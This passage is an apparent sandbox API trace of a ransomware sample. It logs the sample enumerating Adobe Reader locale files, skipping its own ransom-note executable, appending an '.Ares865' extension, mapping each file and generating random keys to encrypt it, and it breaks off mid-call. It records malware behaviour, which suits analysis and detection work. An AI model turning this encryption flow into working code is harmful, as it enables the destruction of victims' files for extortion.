[0061.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0061.074] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832ee480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search.CAT", cAlternateFileName="")) returned 1 [0061.074] lstrcmpiW (lpString1="Search.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.074] lstrcmpiW (lpString1="Search.CAT", lpString2="aoldtz.exe") returned 1 [0061.074] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT.Ares865") returned 79 [0061.074] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\search.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\search.cat.ares865"), dwFlags=0x1) returned 1 [0061.078] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\search.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0061.078] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24576) returned 1 [0061.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.078] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.079] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.079] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.079] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6300, lpName=0x0) returned 0x154 [0061.081] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6300) returned 0x190000 [0061.082] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.083] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.083] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0061.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0061.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.084] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0061.084] CloseHandle (hObject=0x154) returned 1 [0061.084] CloseHandle (hObject=0x118) returned 1 [0061.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0061.085] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendMail.CAT", cAlternateFileName="")) returned 1 [0061.085] lstrcmpiW (lpString1="SendMail.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.085] lstrcmpiW (lpString1="SendMail.CAT", lpString2="aoldtz.exe") returned 1 [0061.085] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT.Ares865") returned 81 [0061.085] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\sendmail.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\sendmail.cat.ares865"), dwFlags=0x1) returned 1 [0061.087] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\sendmail.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0061.087] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16896) returned 1 [0061.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3450020 [0061.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.088] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.088] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.089] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.089] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4500, lpName=0x0) returned 0x164 [0061.092] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4500) returned 0x1a0000 [0061.093] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.094] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.094] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0061.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0061.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.095] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0061.095] CloseHandle (hObject=0x164) returned 1 [0061.095] CloseHandle (hObject=0x154) returned 1 [0061.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3450020 | out: hHeap=0x2b0000) returned 1 [0061.095] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0061.095] lstrcmpiW (lpString1="Services", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.095] lstrcmpiW (lpString1="Services", lpString2="aoldtz.exe") returned 1 [0061.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0061.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x2d1ea0 [0061.095] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2e7c10 [0061.095] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f498460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Spelling.CAT", cAlternateFileName="")) returned 1 [0061.095] lstrcmpiW (lpString1="Spelling.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.095] lstrcmpiW (lpString1="Spelling.CAT", lpString2="aoldtz.exe") returned 1 [0061.096] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT.Ares865") returned 81 [0061.096] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\spelling.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\spelling.cat.ares865"), dwFlags=0x1) returned 1 [0061.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\spelling.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0061.097] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10752) returned 1 [0061.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3450020 [0061.098] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.098] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.098] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.098] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.098] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.099] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2d00, lpName=0x0) returned 0x164 [0061.100] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2d00) returned 0x1a0000 [0061.101] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.102] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.102] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0061.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0061.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.103] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0061.103] CloseHandle (hObject=0x164) returned 1 [0061.103] CloseHandle (hObject=0x154) returned 1 [0061.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3450020 | out: hHeap=0x2b0000) returned 1 [0061.103] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f5309e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="updater.CAT", cAlternateFileName="")) returned 1 [0061.103] lstrcmpiW (lpString1="updater.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.103] lstrcmpiW (lpString1="updater.CAT", lpString2="aoldtz.exe") returned 1 [0061.103] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT.Ares865") returned 80 [0061.103] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\updater.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\updater.cat.ares865"), dwFlags=0x1) returned 1 [0061.105] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\updater.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0061.105] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10752) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3450020 [0061.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.106] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.106] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.106] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.106] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2d00, lpName=0x0) returned 0x164 [0061.108] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2d00) returned 0x1a0000 [0061.109] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.110] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.110] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.110] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0061.110] CloseHandle (hObject=0x164) returned 1 [0061.110] CloseHandle (hObject=0x154) returned 1 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3450020 | out: hHeap=0x2b0000) returned 1 [0061.111] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832ee480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebLink.CAT", cAlternateFileName="")) returned 1 [0061.111] lstrcmpiW (lpString1="WebLink.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.111] lstrcmpiW (lpString1="WebLink.CAT", lpString2="aoldtz.exe") returned 1 [0061.111] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT.Ares865") returned 80 [0061.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\weblink.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\weblink.cat.ares865"), dwFlags=0x1) returned 1 [0061.112] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\weblink.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0061.112] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=29184) returned 1 [0061.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3450020 [0061.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.113] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.114] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.114] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.114] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7500, lpName=0x0) returned 0x164 [0061.115] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7500) returned 0x1a0000 [0061.117] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.118] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.118] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0061.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0061.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.118] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0061.119] CloseHandle (hObject=0x164) returned 1 [0061.119] CloseHandle (hObject=0x154) returned 1 [0061.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3450020 | out: hHeap=0x2b0000) returned 1 [0061.119] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: 